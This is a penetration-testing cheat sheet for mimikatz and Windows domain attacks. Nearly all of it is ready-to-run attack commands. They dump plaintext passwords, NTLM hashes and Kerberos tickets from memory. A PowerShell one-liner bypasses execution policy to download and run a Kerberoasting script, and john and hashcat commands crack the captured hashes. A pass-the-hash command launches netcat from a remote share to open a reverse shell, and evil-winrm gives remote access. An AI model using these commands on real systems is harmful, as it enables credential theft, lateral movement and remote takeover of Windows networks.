mimikatz

mimikatz is a powerful post-exploitation tool for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory on Windows systems.

• Latest trunk release
• 2.2.1 trunk (mirror)
• 2.2.1 trunk (alt)

Basic Commands

• Check domain users:

  net user /domain

• Check privilege:

  privilege::debug

• Dump credentials (passwords, NTLM hashes):

  sekurlsa::logonpasswords

• List Kerberos tickets:

  sekurlsa::tickets

Kerberoasting (Extracting Kerberos Tickets)

• Export tickets for offline cracking:

  kerberos::list /export

  If this doesn't work, use PowerShell alternatives:

  • How to Kerberoast like a boss (Pentest Partners)

  powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
  john --format=krb5tgs kerb-Hash0.txt --wordlist=/usr/share/wordlists/rockyou.txt

• Other tools:

  • kerberoast (Python)
  • tgsrepcrack.py
  • kirbi2hashcat.py
  • kirbi2john.py

  python tgsrepcrack.py /usr/share/wordlists/rockyou.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
  hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Pass-the-Hash & Command Execution

• Pass-the-Hash and run a command:

  sekurlsa::pth /user:username /domain:domain.com /ntlm:7c... /run:"\\192.168.119.1\a\bin\nc.exe -nv 192.168.119.1 443 -e cmd.exe"

• Evil-WinRM for remote shell:

  rbenv shell 2.7.4 ; gem install evil-winrm
  evil-winrm -u user -p pass -i 10.11.1.1